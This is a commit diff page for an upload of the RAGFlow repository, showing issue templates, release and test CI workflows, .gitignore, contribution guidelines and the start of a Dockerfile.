pandaall commited on
Commit
ec730cc
·
verified ·
1 Parent(s): 01640cb

Upload 1223 files

Browse files
This view is limited to 50 files because it contains too many changes.   See raw diff
Files changed (50) hide show
  1. .gitattributes +39 -0
  2. ragflow-main/.gitattributes +1 -0
  3. ragflow-main/.github/ISSUE_TEMPLATE/bug_report.yml +67 -0
  4. ragflow-main/.github/ISSUE_TEMPLATE/feature_request.md +10 -0
  5. ragflow-main/.github/ISSUE_TEMPLATE/feature_request.yml +46 -0
  6. ragflow-main/.github/ISSUE_TEMPLATE/question.yml +15 -0
  7. ragflow-main/.github/ISSUE_TEMPLATE/subtask.yml +29 -0
  8. ragflow-main/.github/pull_request_template.md +12 -0
  9. ragflow-main/.github/workflows/release.yml +124 -0
  10. ragflow-main/.github/workflows/tests.yml +137 -0
  11. ragflow-main/.gitignore +40 -0
  12. ragflow-main/CONTRIBUTING.md +48 -0
  13. ragflow-main/Dockerfile +209 -0
  14. ragflow-main/Dockerfile.deps +10 -0
  15. ragflow-main/Dockerfile.scratch.oc9 +60 -0
  16. ragflow-main/LICENSE +201 -0
  17. ragflow-main/README.md +364 -0
  18. ragflow-main/README_id.md +333 -0
  19. ragflow-main/README_ja.md +327 -0
  20. ragflow-main/README_ko.md +327 -0
  21. ragflow-main/README_pt_br.md +354 -0
  22. ragflow-main/README_tzh.md +353 -0
  23. ragflow-main/README_zh.md +352 -0
  24. ragflow-main/SECURITY.md +74 -0
  25. ragflow-main/agent/README.md +45 -0
  26. ragflow-main/agent/README_zh.md +46 -0
  27. ragflow-main/agent/__init__.py +18 -0
  28. ragflow-main/agent/canvas.py +366 -0
  29. ragflow-main/agent/component/__init__.py +133 -0
  30. ragflow-main/agent/component/akshare.py +56 -0
  31. ragflow-main/agent/component/answer.py +89 -0
  32. ragflow-main/agent/component/arxiv.py +68 -0
  33. ragflow-main/agent/component/baidu.py +67 -0
  34. ragflow-main/agent/component/baidufanyi.py +96 -0
  35. ragflow-main/agent/component/base.py +586 -0
  36. ragflow-main/agent/component/begin.py +49 -0
  37. ragflow-main/agent/component/bing.py +84 -0
  38. ragflow-main/agent/component/categorize.py +98 -0
  39. ragflow-main/agent/component/concentrator.py +36 -0
  40. ragflow-main/agent/component/crawler.py +67 -0
  41. ragflow-main/agent/component/deepl.py +61 -0
  42. ragflow-main/agent/component/duckduckgo.py +66 -0
  43. ragflow-main/agent/component/email.py +138 -0
  44. ragflow-main/agent/component/exesql.py +155 -0
  45. ragflow-main/agent/component/generate.py +247 -0
  46. ragflow-main/agent/component/github.py +61 -0
  47. ragflow-main/agent/component/google.py +96 -0
  48. ragflow-main/agent/component/googlescholar.py +70 -0
  49. ragflow-main/agent/component/invoke.py +116 -0
  50. ragflow-main/agent/component/iteration.py +45 -0
.gitattributes CHANGED
@@ -57,3 +57,42 @@ saved_model/**/* filter=lfs diff=lfs merge=lfs -text
57
  # Video files - compressed
58
  *.mp4 filter=lfs diff=lfs merge=lfs -text
59
  *.webm filter=lfs diff=lfs merge=lfs -text
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
57
  # Video files - compressed
58
  *.mp4 filter=lfs diff=lfs merge=lfs -text
59
  *.webm filter=lfs diff=lfs merge=lfs -text
60
+ ragflow-main/web/src/assets/inter/Inter-Black.woff2 filter=lfs diff=lfs merge=lfs -text
61
+ ragflow-main/web/src/assets/inter/Inter-BlackItalic.woff2 filter=lfs diff=lfs merge=lfs -text
62
+ ragflow-main/web/src/assets/inter/Inter-Bold.woff2 filter=lfs diff=lfs merge=lfs -text
63
+ ragflow-main/web/src/assets/inter/Inter-BoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
64
+ ragflow-main/web/src/assets/inter/Inter-ExtraBold.woff2 filter=lfs diff=lfs merge=lfs -text
65
+ ragflow-main/web/src/assets/inter/Inter-ExtraBoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
66
+ ragflow-main/web/src/assets/inter/Inter-ExtraLight.woff2 filter=lfs diff=lfs merge=lfs -text
67
+ ragflow-main/web/src/assets/inter/Inter-ExtraLightItalic.woff2 filter=lfs diff=lfs merge=lfs -text
68
+ ragflow-main/web/src/assets/inter/Inter-Italic.woff2 filter=lfs diff=lfs merge=lfs -text
69
+ ragflow-main/web/src/assets/inter/Inter-Light.woff2 filter=lfs diff=lfs merge=lfs -text
70
+ ragflow-main/web/src/assets/inter/Inter-LightItalic.woff2 filter=lfs diff=lfs merge=lfs -text
71
+ ragflow-main/web/src/assets/inter/Inter-Medium.woff2 filter=lfs diff=lfs merge=lfs -text
72
+ ragflow-main/web/src/assets/inter/Inter-MediumItalic.woff2 filter=lfs diff=lfs merge=lfs -text
73
+ ragflow-main/web/src/assets/inter/Inter-Regular.woff2 filter=lfs diff=lfs merge=lfs -text
74
+ ragflow-main/web/src/assets/inter/Inter-SemiBold.woff2 filter=lfs diff=lfs merge=lfs -text
75
+ ragflow-main/web/src/assets/inter/Inter-SemiBoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
76
+ ragflow-main/web/src/assets/inter/Inter-Thin.woff2 filter=lfs diff=lfs merge=lfs -text
77
+ ragflow-main/web/src/assets/inter/Inter-ThinItalic.woff2 filter=lfs diff=lfs merge=lfs -text
78
+ ragflow-main/web/src/assets/inter/InterDisplay-Black.woff2 filter=lfs diff=lfs merge=lfs -text
79
+ ragflow-main/web/src/assets/inter/InterDisplay-BlackItalic.woff2 filter=lfs diff=lfs merge=lfs -text
80
+ ragflow-main/web/src/assets/inter/InterDisplay-Bold.woff2 filter=lfs diff=lfs merge=lfs -text
81
+ ragflow-main/web/src/assets/inter/InterDisplay-BoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
82
+ ragflow-main/web/src/assets/inter/InterDisplay-ExtraBold.woff2 filter=lfs diff=lfs merge=lfs -text
83
+ ragflow-main/web/src/assets/inter/InterDisplay-ExtraBoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
84
+ ragflow-main/web/src/assets/inter/InterDisplay-ExtraLight.woff2 filter=lfs diff=lfs merge=lfs -text
85
+ ragflow-main/web/src/assets/inter/InterDisplay-ExtraLightItalic.woff2 filter=lfs diff=lfs merge=lfs -text
86
+ ragflow-main/web/src/assets/inter/InterDisplay-Italic.woff2 filter=lfs diff=lfs merge=lfs -text
87
+ ragflow-main/web/src/assets/inter/InterDisplay-Light.woff2 filter=lfs diff=lfs merge=lfs -text
88
+ ragflow-main/web/src/assets/inter/InterDisplay-LightItalic.woff2 filter=lfs diff=lfs merge=lfs -text
89
+ ragflow-main/web/src/assets/inter/InterDisplay-Medium.woff2 filter=lfs diff=lfs merge=lfs -text
90
+ ragflow-main/web/src/assets/inter/InterDisplay-MediumItalic.woff2 filter=lfs diff=lfs merge=lfs -text
91
+ ragflow-main/web/src/assets/inter/InterDisplay-Regular.woff2 filter=lfs diff=lfs merge=lfs -text
92
+ ragflow-main/web/src/assets/inter/InterDisplay-SemiBold.woff2 filter=lfs diff=lfs merge=lfs -text
93
+ ragflow-main/web/src/assets/inter/InterDisplay-SemiBoldItalic.woff2 filter=lfs diff=lfs merge=lfs -text
94
+ ragflow-main/web/src/assets/inter/InterDisplay-Thin.woff2 filter=lfs diff=lfs merge=lfs -text
95
+ ragflow-main/web/src/assets/inter/InterDisplay-ThinItalic.woff2 filter=lfs diff=lfs merge=lfs -text
96
+ ragflow-main/web/src/assets/inter/InterVariable-Italic.woff2 filter=lfs diff=lfs merge=lfs -text
97
+ ragflow-main/web/src/assets/inter/InterVariable.woff2 filter=lfs diff=lfs merge=lfs -text
98
+ ragflow-main/web/src/assets/svg/chunk-method/media-01.svg filter=lfs diff=lfs merge=lfs -text
ragflow-main/.gitattributes ADDED
@@ -0,0 +1 @@
 
 
1
+ *.sh text eol=lf
ragflow-main/.github/ISSUE_TEMPLATE/bug_report.yml ADDED
@@ -0,0 +1,67 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ name: Bug Report
2
+ description: Create a bug issue for RAGFlow
3
+ title: "[Bug]: "
4
+ labels: [bug]
5
+ body:
6
+ - type: checkboxes
7
+ attributes:
8
+ label: Is there an existing issue for the same bug?
9
+ description: Please check if an issue already exists for the bug you encountered.
10
+ options:
11
+ - label: I have checked the existing issues.
12
+ required: true
13
+ - type: markdown
14
+ attributes:
15
+ value: "Please provide the following information to help us understand the issue."
16
+ - type: input
17
+ attributes:
18
+ label: RAGFlow workspace code commit ID
19
+ description: Enter the commit ID associated with the issue.
20
+ placeholder: e.g., 26d3480e
21
+ validations:
22
+ required: true
23
+ - type: input
24
+ attributes:
25
+ label: RAGFlow image version
26
+ description: Enter the image version(shown in RAGFlow UI, `System` page) associated with the issue.
27
+ placeholder: e.g., 26d3480e(v0.13.0~174)
28
+ validations:
29
+ required: true
30
+ - type: textarea
31
+ attributes:
32
+ label: Other environment information
33
+ description: |
34
+ Enter the environment details:
35
+ value: |
36
+ - Hardware parameters:
37
+ - OS type:
38
+ - Others:
39
+ render: Markdown
40
+ validations:
41
+ required: false
42
+ - type: textarea
43
+ attributes:
44
+ label: Actual behavior
45
+ description: Describe what you encountered.
46
+ validations:
47
+ required: true
48
+ - type: textarea
49
+ attributes:
50
+ label: Expected behavior
51
+ description: Describe what you expected.
52
+ validations:
53
+ required: false
54
+ - type: textarea
55
+ attributes:
56
+ label: Steps to reproduce
57
+ description: Steps to reproduce what you encountered.
58
+ render: Markdown
59
+ validations:
60
+ required: true
61
+ - type: textarea
62
+ attributes:
63
+ label: Additional information
64
+ description: |
65
+ Log, error message, or any other information can help find the root cause.
66
+ validations:
67
+ required: false
ragflow-main/.github/ISSUE_TEMPLATE/feature_request.md ADDED
@@ -0,0 +1,10 @@
 
 
 
 
 
 
 
 
 
 
 
1
+ ---
2
+ name: Feature request
3
+ title: '[Feature Request]: '
4
+ about: Suggest an idea for RAGFlow
5
+ labels: ''
6
+ ---
7
+
8
+ **Summary**
9
+
10
+ Description for this feature.
ragflow-main/.github/ISSUE_TEMPLATE/feature_request.yml ADDED
@@ -0,0 +1,46 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ name: Feature request
2
+ description: Propose a feature request for RAGFlow.
3
+ title: "[Feature Request]: "
4
+ labels: [feature request]
5
+ body:
6
+ - type: checkboxes
7
+ attributes:
8
+ label: Is there an existing issue for the same feature request?
9
+ description: Please check if an issue already exists for the feature you request.
10
+ options:
11
+ - label: I have checked the existing issues.
12
+ required: true
13
+ - type: textarea
14
+ attributes:
15
+ label: Is your feature request related to a problem?
16
+ description: |
17
+ A clear and concise description of what the problem is. Ex. I'm always frustrated when [...]
18
+ render: Markdown
19
+ validations:
20
+ required: false
21
+ - type: textarea
22
+ attributes:
23
+ label: Describe the feature you'd like
24
+ description: A clear and concise description of what you want to happen.
25
+ validations:
26
+ required: true
27
+ - type: textarea
28
+ attributes:
29
+ label: Describe implementation you've considered
30
+ description: A clear and concise description of implementation you've considered or investigated.
31
+ validations:
32
+ required: false
33
+ - type: textarea
34
+ attributes:
35
+ label: Documentation, adoption, use case
36
+ description: If you can, explain some scenarios how users might use this, situations it would be helpful in. Any API designs, mockups, or diagrams are also helpful.
37
+ render: Markdown
38
+ validations:
39
+ required: false
40
+ - type: textarea
41
+ attributes:
42
+ label: Additional information
43
+ description: |
44
+ Add any other context or screenshots about the feature request here.
45
+ validations:
46
+ required: false
ragflow-main/.github/ISSUE_TEMPLATE/question.yml ADDED
@@ -0,0 +1,15 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ name: Question
2
+ description: Ask questions on RAGFlow
3
+ title: "[Question]: "
4
+ labels: [question]
5
+ body:
6
+ - type: markdown
7
+ attributes:
8
+ value: |
9
+ If the previous templates don't fit with what you'd like to report or ask, please use this general question template to file issue.
10
+ - type: textarea
11
+ attributes:
12
+ label: Describe your problem
13
+ description: A clear and concise description of your problem.
14
+ validations:
15
+ required: true
ragflow-main/.github/ISSUE_TEMPLATE/subtask.yml ADDED
@@ -0,0 +1,29 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ name: Subtask
2
+ description: "Propose a subtask for RAGFlow"
3
+ title: "[Subtask]: "
4
+ labels: [subtask]
5
+
6
+ body:
7
+ - type: textarea
8
+ attributes:
9
+ label: Parent Issue
10
+ description: Write the ID of the parent issue
11
+ placeholder: "Parent issue: #"
12
+ validations:
13
+ required: true
14
+
15
+ - type: textarea
16
+ attributes:
17
+ label: Detail of Subtask
18
+ description: |
19
+ Describe the functions that this subtask should implement
20
+ validations:
21
+ required: true
22
+
23
+ - type: textarea
24
+ attributes:
25
+ label: Describe implementation you've considered
26
+ description: A clear and concise description of implementation you've considered or investigated.
27
+ validations:
28
+ required: false
29
+
ragflow-main/.github/pull_request_template.md ADDED
@@ -0,0 +1,12 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ ### What problem does this PR solve?
2
+
3
+ _Briefly describe what this PR aims to solve. Include background context that will help reviewers understand the purpose of the PR._
4
+
5
+ ### Type of change
6
+
7
+ - [ ] Bug Fix (non-breaking change which fixes an issue)
8
+ - [ ] New Feature (non-breaking change which adds functionality)
9
+ - [ ] Documentation Update
10
+ - [ ] Refactoring
11
+ - [ ] Performance Improvement
12
+ - [ ] Other (please describe):
ragflow-main/.github/workflows/release.yml ADDED
@@ -0,0 +1,124 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ name: release
2
+
3
+ on:
4
+ schedule:
5
+ - cron: '0 13 * * *' # This schedule runs every 13:00:00Z(21:00:00+08:00)
6
+ # The "create tags" trigger is specifically focused on the creation of new tags, while the "push tags" trigger is activated when tags are pushed, including both new tag creations and updates to existing tags.
7
+ create:
8
+ tags:
9
+ - "v*.*.*" # normal release
10
+ - "nightly" # the only one mutable tag
11
+
12
+ # https://docs.github.com/en/actions/using-jobs/using-concurrency
13
+ concurrency:
14
+ group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
15
+ cancel-in-progress: true
16
+
17
+ jobs:
18
+ release:
19
+ runs-on: [ "self-hosted", "overseas" ]
20
+ steps:
21
+ - name: Ensure workspace ownership
22
+ run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE
23
+
24
+ # https://github.com/actions/checkout/blob/v3/README.md
25
+ - name: Check out code
26
+ uses: actions/checkout@v4
27
+ with:
28
+ token: ${{ secrets.MY_GITHUB_TOKEN }} # Use the secret as an environment variable
29
+ fetch-depth: 0
30
+ fetch-tags: true
31
+
32
+ - name: Prepare release body
33
+ run: |
34
+ if [[ $GITHUB_EVENT_NAME == 'create' ]]; then
35
+ RELEASE_TAG=${GITHUB_REF#refs/tags/}
36
+ if [[ $RELEASE_TAG == 'nightly' ]]; then
37
+ PRERELEASE=true
38
+ else
39
+ PRERELEASE=false
40
+ fi
41
+ echo "Workflow triggered by create tag: $RELEASE_TAG"
42
+ else
43
+ RELEASE_TAG=nightly
44
+ PRERELEASE=true
45
+ echo "Workflow triggered by schedule"
46
+ fi
47
+ echo "RELEASE_TAG=$RELEASE_TAG" >> $GITHUB_ENV
48
+ echo "PRERELEASE=$PRERELEASE" >> $GITHUB_ENV
49
+ RELEASE_DATETIME=$(date --rfc-3339=seconds)
50
+ echo Release $RELEASE_TAG created from $GITHUB_SHA at $RELEASE_DATETIME > release_body.md
51
+
52
+ - name: Move the existing mutable tag
53
+ # https://github.com/softprops/action-gh-release/issues/171
54
+ run: |
55
+ git fetch --tags
56
+ if [[ $GITHUB_EVENT_NAME == 'schedule' ]]; then
57
+ # Determine if a given tag exists and matches a specific Git commit.
58
+ # actions/checkout@v4 fetch-tags doesn't work when triggered by schedule
59
+ if [ "$(git rev-parse -q --verify "refs/tags/$RELEASE_TAG")" = "$GITHUB_SHA" ]; then
60
+ echo "mutable tag $RELEASE_TAG exists and matches $GITHUB_SHA"
61
+ else
62
+ git tag -f $RELEASE_TAG $GITHUB_SHA
63
+ git push -f origin $RELEASE_TAG:refs/tags/$RELEASE_TAG
64
+ echo "created/moved mutable tag $RELEASE_TAG to $GITHUB_SHA"
65
+ fi
66
+ fi
67
+
68
+ - name: Create or overwrite a release
69
+ # https://github.com/actions/upload-release-asset has been replaced by https://github.com/softprops/action-gh-release
70
+ uses: softprops/action-gh-release@v2
71
+ with:
72
+ token: ${{ secrets.MY_GITHUB_TOKEN }} # Use the secret as an environment variable
73
+ prerelease: ${{ env.PRERELEASE }}
74
+ tag_name: ${{ env.RELEASE_TAG }}
75
+ # The body field does not support environment variable substitution directly.
76
+ body_path: release_body.md
77
+
78
+ - name: Set up QEMU
79
+ uses: docker/setup-qemu-action@v3
80
+
81
+ - name: Set up Docker Buildx
82
+ uses: docker/setup-buildx-action@v3
83
+
84
+ # https://github.com/marketplace/actions/docker-login
85
+ - name: Login to Docker Hub
86
+ uses: docker/login-action@v3
87
+ with:
88
+ username: infiniflow
89
+ password: ${{ secrets.DOCKERHUB_TOKEN }}
90
+
91
+ # https://github.com/marketplace/actions/build-and-push-docker-images
92
+ - name: Build and push full image
93
+ uses: docker/build-push-action@v6
94
+ with:
95
+ context: .
96
+ push: true
97
+ tags: infiniflow/ragflow:${{ env.RELEASE_TAG }}
98
+ file: Dockerfile
99
+ platforms: linux/amd64
100
+
101
+ # https://github.com/marketplace/actions/build-and-push-docker-images
102
+ - name: Build and push slim image
103
+ uses: docker/build-push-action@v6
104
+ with:
105
+ context: .
106
+ push: true
107
+ tags: infiniflow/ragflow:${{ env.RELEASE_TAG }}-slim
108
+ file: Dockerfile
109
+ build-args: LIGHTEN=1
110
+ platforms: linux/amd64
111
+
112
+ - name: Build ragflow-sdk
113
+ if: startsWith(github.ref, 'refs/tags/v')
114
+ run: |
115
+ cd sdk/python && \
116
+ uv build
117
+
118
+ - name: Publish package distributions to PyPI
119
+ if: startsWith(github.ref, 'refs/tags/v')
120
+ uses: pypa/gh-action-pypi-publish@release/v1
121
+ with:
122
+ packages-dir: sdk/python/dist/
123
+ password: ${{ secrets.PYPI_API_TOKEN }}
124
+ verbose: true
ragflow-main/.github/workflows/tests.yml ADDED
@@ -0,0 +1,137 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ name: tests
2
+
3
+ on:
4
+ push:
5
+ branches:
6
+ - 'main'
7
+ - '*.*.*'
8
+ paths-ignore:
9
+ - 'docs/**'
10
+ - '*.md'
11
+ - '*.mdx'
12
+ pull_request:
13
+ types: [ opened, synchronize, reopened, labeled ]
14
+ paths-ignore:
15
+ - 'docs/**'
16
+ - '*.md'
17
+ - '*.mdx'
18
+
19
+ # https://docs.github.com/en/actions/using-jobs/using-concurrency
20
+ concurrency:
21
+ group: ${{ github.workflow }}-${{ github.event.pull_request.number || github.ref }}
22
+ cancel-in-progress: true
23
+
24
+ jobs:
25
+ ragflow_tests:
26
+ name: ragflow_tests
27
+ # https://docs.github.com/en/actions/using-jobs/using-conditions-to-control-job-execution
28
+ # https://github.com/orgs/community/discussions/26261
29
+ if: ${{ github.event_name != 'pull_request' || contains(github.event.pull_request.labels.*.name, 'ci') }}
30
+ runs-on: [ "self-hosted", "debug" ]
31
+ steps:
32
+ # https://github.com/hmarr/debug-action
33
+ #- uses: hmarr/debug-action@v2
34
+
35
+ - name: Show PR labels
36
+ run: |
37
+ echo "Workflow triggered by ${{ github.event_name }}"
38
+ if [[ ${{ github.event_name }} == 'pull_request' ]]; then
39
+ echo "PR labels: ${{ join(github.event.pull_request.labels.*.name, ', ') }}"
40
+ fi
41
+
42
+ - name: Ensure workspace ownership
43
+ run: echo "chown -R $USER $GITHUB_WORKSPACE" && sudo chown -R $USER $GITHUB_WORKSPACE
44
+
45
+ # https://github.com/actions/checkout/issues/1781
46
+ - name: Check out code
47
+ uses: actions/checkout@v4
48
+ with:
49
+ fetch-depth: 0
50
+ fetch-tags: true
51
+
52
+ # https://github.com/astral-sh/ruff-action
53
+ - name: Static check with Ruff
54
+ uses: astral-sh/ruff-action@v2
55
+ with:
56
+ version: ">=0.8.2"
57
+ args: "check --ignore E402"
58
+
59
+ - name: Build ragflow:nightly-slim
60
+ run: |
61
+ RUNNER_WORKSPACE_PREFIX=${RUNNER_WORKSPACE_PREFIX:-$HOME}
62
+ sudo docker pull ubuntu:22.04
63
+ sudo docker build --progress=plain --build-arg LIGHTEN=1 --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly-slim .
64
+
65
+ - name: Build ragflow:nightly
66
+ run: |
67
+ sudo docker build --progress=plain --build-arg NEED_MIRROR=1 -f Dockerfile -t infiniflow/ragflow:nightly .
68
+
69
+ - name: Start ragflow:nightly-slim
70
+ run: |
71
+ echo "RAGFLOW_IMAGE=infiniflow/ragflow:nightly-slim" >> docker/.env
72
+ sudo docker compose -f docker/docker-compose.yml up -d
73
+
74
+ - name: Stop ragflow:nightly-slim
75
+ if: always() # always run this step even if previous steps failed
76
+ run: |
77
+ sudo docker compose -f docker/docker-compose.yml down -v
78
+
79
+ - name: Start ragflow:nightly
80
+ run: |
81
+ echo "RAGFLOW_IMAGE=infiniflow/ragflow:nightly" >> docker/.env
82
+ sudo docker compose -f docker/docker-compose.yml up -d
83
+
84
+ - name: Run sdk tests against Elasticsearch
85
+ run: |
86
+ export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
87
+ export HOST_ADDRESS=http://host.docker.internal:9380
88
+ until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
89
+ echo "Waiting for service to be available..."
90
+ sleep 5
91
+ done
92
+ cd sdk/python && uv sync --python 3.10 --frozen && uv pip install . && source .venv/bin/activate && cd test/test_sdk_api && pytest -s --tb=short get_email.py t_dataset.py t_chat.py t_session.py t_document.py t_chunk.py
93
+
94
+ - name: Run frontend api tests against Elasticsearch
95
+ run: |
96
+ export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
97
+ export HOST_ADDRESS=http://host.docker.internal:9380
98
+ until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
99
+ echo "Waiting for service to be available..."
100
+ sleep 5
101
+ done
102
+ cd sdk/python && uv sync --python 3.10 --frozen && uv pip install . && source .venv/bin/activate && cd test/test_frontend_api && pytest -s --tb=short get_email.py test_dataset.py
103
+
104
+
105
+ - name: Stop ragflow:nightly
106
+ if: always() # always run this step even if previous steps failed
107
+ run: |
108
+ sudo docker compose -f docker/docker-compose.yml down -v
109
+
110
+ - name: Start ragflow:nightly
111
+ run: |
112
+ sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml up -d
113
+
114
+ - name: Run sdk tests against Infinity
115
+ run: |
116
+ export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
117
+ export HOST_ADDRESS=http://host.docker.internal:9380
118
+ until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
119
+ echo "Waiting for service to be available..."
120
+ sleep 5
121
+ done
122
+ cd sdk/python && uv sync --python 3.10 --frozen && uv pip install . && source .venv/bin/activate && cd test/test_sdk_api && pytest -s --tb=short get_email.py t_dataset.py t_chat.py t_session.py t_document.py t_chunk.py
123
+
124
+ - name: Run frontend api tests against Infinity
125
+ run: |
126
+ export http_proxy=""; export https_proxy=""; export no_proxy=""; export HTTP_PROXY=""; export HTTPS_PROXY=""; export NO_PROXY=""
127
+ export HOST_ADDRESS=http://host.docker.internal:9380
128
+ until sudo docker exec ragflow-server curl -s --connect-timeout 5 ${HOST_ADDRESS} > /dev/null; do
129
+ echo "Waiting for service to be available..."
130
+ sleep 5
131
+ done
132
+ cd sdk/python && uv sync --python 3.10 --frozen && uv pip install . && source .venv/bin/activate && cd test/test_frontend_api && pytest -s --tb=short get_email.py test_dataset.py
133
+
134
+ - name: Stop ragflow:nightly
135
+ if: always() # always run this step even if previous steps failed
136
+ run: |
137
+ sudo DOC_ENGINE=infinity docker compose -f docker/docker-compose.yml down -v
ragflow-main/.gitignore ADDED
@@ -0,0 +1,40 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Generated by Cargo
2
+ # will have compiled files and executables
3
+ debug/
4
+ target/
5
+ __pycache__/
6
+ hudet/
7
+ cv/
8
+ layout_app.py
9
+ api/flask_session
10
+
11
+ # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries
12
+ # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html
13
+ Cargo.lock
14
+
15
+ # These are backup files generated by rustfmt
16
+ **/*.rs.bk
17
+
18
+ # MSVC Windows builds of rustc generate these, which store debugging information
19
+ *.pdb
20
+ *.trie
21
+
22
+ .idea/
23
+ .vscode/
24
+
25
+ # Exclude Mac generated files
26
+ .DS_Store
27
+
28
+ # Exclude the log folder
29
+ docker/ragflow-logs/
30
+ /flask_session
31
+ /logs
32
+ rag/res/deepdoc
33
+
34
+ # Exclude sdk generated files
35
+ sdk/python/ragflow.egg-info/
36
+ sdk/python/build/
37
+ sdk/python/dist/
38
+ sdk/python/ragflow_sdk.egg-info/
39
+ huggingface.co/
40
+ nltk_data/
ragflow-main/CONTRIBUTING.md ADDED
@@ -0,0 +1,48 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # Contribution guidelines
2
+
3
+ This document offers guidelines and major considerations for submitting your contributions to RAGFlow.
4
+
5
+ - To report a bug, file a [GitHub issue](https://github.com/infiniflow/ragflow/issues/new/choose) with us.
6
+ - For further questions, you can explore existing discussions or initiate a new one in [Discussions](https://github.com/orgs/infiniflow/discussions).
7
+
8
+ ## What you can contribute
9
+
10
+ The list below mentions some contributions you can make, but it is not a complete list.
11
+
12
+ - Proposing or implementing new features
13
+ - Fixing a bug
14
+ - Adding test cases or demos
15
+ - Posting a blog or tutorial
16
+ - Updates to existing documents, codes, or annotations.
17
+ - Suggesting more user-friendly error codes
18
+
19
+ ## File a pull request (PR)
20
+
21
+ ### General workflow
22
+
23
+ 1. Fork our GitHub repository.
24
+ 2. Clone your fork to your local machine:
25
+ `git clone [email protected]:<yourname>/ragflow.git`
26
+ 3. Create a local branch:
27
+ `git checkout -b my-branch`
28
+ 4. Provide sufficient information in your commit message
29
+ `git commit -m 'Provide sufficient info in your commit message'`
30
+ 5. Commit changes to your local branch, and push to GitHub: (include necessary commit message)
31
+ `git push origin my-branch.`
32
+ 6. Submit a pull request for review.
33
+
34
+ ### Before filing a PR
35
+
36
+ - Consider splitting a large PR into multiple smaller, standalone PRs to keep a traceable development history.
37
+ - Ensure that your PR addresses just one issue, or keep any unrelated changes small.
38
+ - Add test cases when contributing new features. They demonstrate that your code functions correctly and protect against potential issues from future changes.
39
+
40
+ ### Describing your PR
41
+
42
+ - Ensure that your PR title is concise and clear, providing all the required information.
43
+ - Refer to a corresponding GitHub issue in your PR description if applicable.
44
+ - Include sufficient design details for *breaking changes* or *API changes* in your description.
45
+
46
+ ### Reviewing & merging a PR
47
+
48
+ Ensure that your PR passes all Continuous Integration (CI) tests before merging it.
ragflow-main/Dockerfile ADDED
@@ -0,0 +1,209 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ # base stage
